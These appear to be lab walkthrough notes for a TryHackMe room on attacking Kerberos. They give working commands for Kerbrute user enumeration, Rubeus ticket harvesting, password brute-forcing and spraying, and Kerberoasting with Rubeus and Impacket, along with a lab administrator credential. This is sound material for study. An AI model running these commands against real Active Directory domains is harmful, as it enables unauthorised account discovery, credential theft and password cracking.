https://tryhackme.com/room/attackingkerberos

Task 1 - Introduction

Task 2 - Enumeration w/ Kerbrute

Releases · ropnop/kerbrute

Enumerating Users w/ Kerbrute

We will be using the kerbrute_linux_amd64 release binary on our Kali machine

./kerbrute_linux_amd64 userenum --dc CONTROLLER.local -d CONTROLLER.local username_list.txt

CONTROLLER.local is the domain controller's hostname; it must resolve to the target's IP, so add an entry for it in /etc/hosts before running kerbrute. --dc is the KDC to send the requests to and -d is the domain the usernames are tested against. Kerbrute tells valid from invalid names by the KDC's answer to an AS-REQ (a known user gets a pre-authentication-required error, an unknown one gets "principal unknown"), so no password is needed and no failed-logon count is incremented.

Task 3 - Harvesting & Brute-Forcing Tickets w/ Rubeus

https://github.com/GhostPack/Rubeus

Username: Administrator 
Password: P@$$W0rd 
Domain: controller.local

To have Rubeus harvest TGTs every 30 seconds (run on the target Windows machine; an elevated context is needed to see other users' tickets)

Rubeus.exe harvest /interval:30

We can also use Rubeus to brute-force and password-spray. The DC's hostname has to be resolvable first, so add it to the Windows hosts file (single backslashes in the path; from an elevated prompt). Check the domain's lockout threshold before spraying, since every failed attempt counts against each account.

echo 10.10.46.16 CONTROLLER.local >> C:\Windows\System32\drivers\etc\hosts
Rubeus.exe brute /password:Password1 /noticket

Task 4 - Kerberoasting w/ Rubeus & Impacket

This requests a service ticket for every account that has an SPN set and dumps the encrypted part of each ticket as a crackable hash. It works because that part is encrypted with the service account's own password hash, so cracking it offline recovers the account's password.

Rubeus.exe kerberoast

However, Rubeus wraps each hash over several indented lines, so the output has to be stripped back to a single line with no whitespace before hashcat or John will accept it (running kerberoast with /nowrap avoids the wrapping in the first place).

As an alternative, we will be using Impacket's GetUserSPNs module, which prints each hash on one line.